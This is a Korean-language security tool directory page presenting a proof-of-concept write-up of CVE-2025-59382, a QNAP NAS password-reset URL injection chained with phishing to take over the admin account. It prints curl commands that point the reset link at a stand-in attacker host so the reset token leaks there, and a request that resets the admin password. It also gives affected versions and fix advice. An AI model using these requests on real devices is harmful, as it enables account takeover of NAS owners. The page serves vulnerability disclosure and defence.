Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
도구/GitHubGitHub/rat5ak/cve-2025-59382-qnap-password-reset-account-takeover
Vulnerability AnalysisExploitationWeb Application ExploitationPhishingPenetration TestingLearning & Education
GitHubrat5ak/cve-2025-59382-qnap-password-reset-account-takeover

CVE-2025-59382-QNAP-Password-Reset-Account-Takeover

CVE-2025-59382에 대한 개념 증명 및 기술 분석 문서. QNAP NAS의 인증되지 않은 비밀번호 재설정 URL 주입 취약점으로, 피싱을 통한 계정 탈취 공격 체인을 가능하게 합니다.

저장소 보기
1112개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2025-59382: QNAP 비밀번호 재설정을 통한 계정 탈취

인증되지 않은 공격자가 제어하는 비밀번호 재설정 URL이 /cgi-bin/reset_password.cgi에 존재합니다.

실험실 환경에서 QuTScloud c5.2.4.3041 build 20250211에 대해 테스트했습니다. QNAP은 이후 권고 QSA-26-10에서 이를 CVE-2025-59382로 발표했습니다.

요약

로컬 네트워크에 접근 가능하거나 노출된 NAS 관리 인터페이스에 접근할 수 있는 인증되지 않은 공격자는 /cgi-bin/reset_password.cgi의 send_mail 함수에서 url 매개변수를 조작하여 공식 QNAP 비밀번호 재설정 이메일에 임의의 URL을 삽입할 수 있습니다.

피해자는 NAS로부터 실제 QNAP 비밀번호 재설정 이메일을 받습니다. 공격자 URL은 HTML 이메일 본문에 직접 포함되며, QNAP은 해당 URL에 재설정 토큰(rp)을 추가합니다.

이를 통해 비밀번호 재설정 이메일이 깔끔한 피싱→계정 탈취 체인으로 변합니다:

  • 공격자가 자신의 URL로 비밀번호 재설정을 트리거합니다.
  • NAS가 피해자에게 실제 QNAP 재설정 이메일을 보냅니다.
  • 피해자가 공격자 URL을 클릭합니다.
  • 공격자가 rp 재설정 토큰을 받습니다.
  • 피해자가 피싱 페이지에 인증 코드(vc)를 입력합니다.
  • 공격자가 관리자 비밀번호를 재설정하고 로그인합니다.
  • 피해자의 상호작용이 필요하지만, 공격자 인증은 필요하지 않습니다.

    트리거

    root@kitploit:~
    curl "http://<NAS_IP>:8080/cgi-bin/reset_password.cgi?func=send_mail&user=admin&url=https://attacker.example.com/phish"
    

    NAS는 공식 재설정 이메일을 보내고 재설정 토큰을 공격자 URL에 추가합니다. 예를 들면:

    root@kitploit:~
    https://attacker.example.com/phish&u=admin&rp=e15a88a01fa81e58352b4b157607cb44
    

    인증 코드도 같은 이메일에 표시됩니다. 실험실 증거에서는 다음과 같았습니다:

    root@kitploit:~
    Your verification code is: 2FEA2B8B
    

    따라서 피싱 페이지는 피해자에게 인증 코드만 요청하면 됩니다. 링크가 클릭되면 rp 토큰은 이미 공격자의 서버로 전달됩니다.

    비밀번호 재설정

    공격자가 rp 토큰과 관련 vc 인증 코드를 확보하면 관리자 비밀번호를 재설정할 수 있습니다:

    root@kitploit:~
    curl -X POST -d "func=reset_user_pw&user=admin&token=e15a88a01fa81e58352b4b157607cb44&vc=725E0F00&new_pw=UHduZWQyMDI2IQ==" \
      "http://<NAS_IP>:8080/cgi-bin/reset_password.cgi"
    

    최종 재설정 호출은 POST여야 합니다. 피해자가 가짜 페이지에 입력한 인증 코드는 vc=<code>로 QNAP에 전송됩니다.

    새 비밀번호는 new_pw에 base64로 인코딩됩니다. PoC에서는 이 방법으로 관리자 비밀번호를 변경하고 관리자로 로그인하기에 충분했습니다.

    작동 원리

    정상적인 프론트엔드 흐름은 다음과 같은 로컬 NAS URL을 구성합니다:

    root@kitploit:~
    location.protocol + "//" + location.host + "/cgi-bin/main.html?cp=1"
    

    그러나 백엔드는 자체적으로 재설정 URL을 생성하는 대신 클라이언트가 제공한 url 매개변수를 신뢰합니다. 그런 다음 해당 값을 사용하여 이메일 링크를 구성하고 다음을 추가합니다:

    root@kitploit:~
    &u=<user>&rp=<reset_token>
    

    url로 전달되는 모든 값을 그대로 신뢰합니다.

    영향

    • 인증되지 않은 재설정 이메일 트리거
    • 공식 QNAP 이메일에 공격자가 제어하는 URL 포함
    • 피해자가 클릭 시 재설정 토큰이 공격자에게 유출됨
    • 동일한 이메일 흐름에서 인증 코드를 피싱할 수 있음
    • 실험실 체인에서 관리자 비밀번호 재설정 및 관리자 로그인 입증됨

    신뢰할 수 있는 NAS 이메일이 전달을 수행합니다.

    공개 상태

    • CVE: CVE-2025-59382
    • 권고: QSA-26-10
    • QNAP 권고 발표일: 2026-06-17
    • 공급업체 CWE: CWE-472
    • 공급업체 CVSS v4.0: 5.1 보통
    • QNAP 상태: 해결됨

    QNAP은 영향을 받는 제품을 다음과 같이 나열합니다:

    • QTS 5.2.7
    • QuTS hero h5.2.8
    • QuTS cloud c5.2.8
    • QVP 2.7.1

    QNAP이 나열한 수정 버전:

    • QTS 5.2.9.3499
    • QuTS hero h5.2.9
    • QuTS cloud C5.2.9
    • QVP 2.8.0

    QNAP은 이 문제를 원격 공격자가 비밀번호 재설정 URL을 수정하고 피해자를 속여 공격자가 제어하는 재설정 페이지를 방문하게 하여 자격 증명을 탈취하는 것으로 설명했습니다.

    제 실험실 대상은 QuTScloud c5.2.4.3041 build 20250211였습니다. 실험실에서 피해자 상호작용 후 관리자 비밀번호 재설정 및 관리자 로그인이 가능함을 확인했습니다.

    참고: 2026-05-09에 실험실에서 이를 재현하고 2026-05-11에 QNAP에 제출했으며, QNAP은 이를 INTSI000-9029의 중복으로 표시했습니다. QNAP이 CVE/권고를 발표했으므로 POC를 공개합니다. 최초 발견자인 Tim Coen에게 감사를 표합니다.

    수정 제안

    QNAP이 사용한 정확한 패치를 알 수 없습니다. 권고에는 수정 버전만 나열되어 있습니다.

    올바른 수정 방법은 간단합니다: 브라우저가 NAS에 재설정 링크가 가리켜야 할 위치를 알려주지 않도록 하는 것입니다.

    NAS가 링크를 자체적으로 구성해야 합니다. QNAP이 여전히 흐름에 url 매개변수가 필요하다면, 일반 NAS 재설정 페이지만 허용하고 외부의 모든 것을 거부해야 합니다.

    또한 이메일 본문에 포함되는 모든 내용을 인코딩하고, 인증되지 않은 재설정 이메일 요청에 속도 제한을 두는 것이 좋습니다.

    참고 자료

    • QNAP advisory: https://www.qnap.com/en/security-advisory/qsa-26-10
    • QNAP CVE JSON: https://www.qnap.com/uploads/security-advisories/QSA-26-10/CVE-2025-59382.json
    • NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-59382
    • CVE record: https://www.cve.org/CVERecord?id=CVE-2025-59382

    면책 조항: 이 익스플로잇 코드는 교육 및 방어 연구 목적으로 공개되었습니다. 소유하지 않거나 테스트할 명시적 권한이 없는 시스템에
    사용하지 마십시오. 저자는 오용에 대해 책임을 지지 않습니다.

    Daniel Wade - GitHub · Twitter/X · Bluesky · Mastodon · Medium · nadsec.online

    도구 다운로드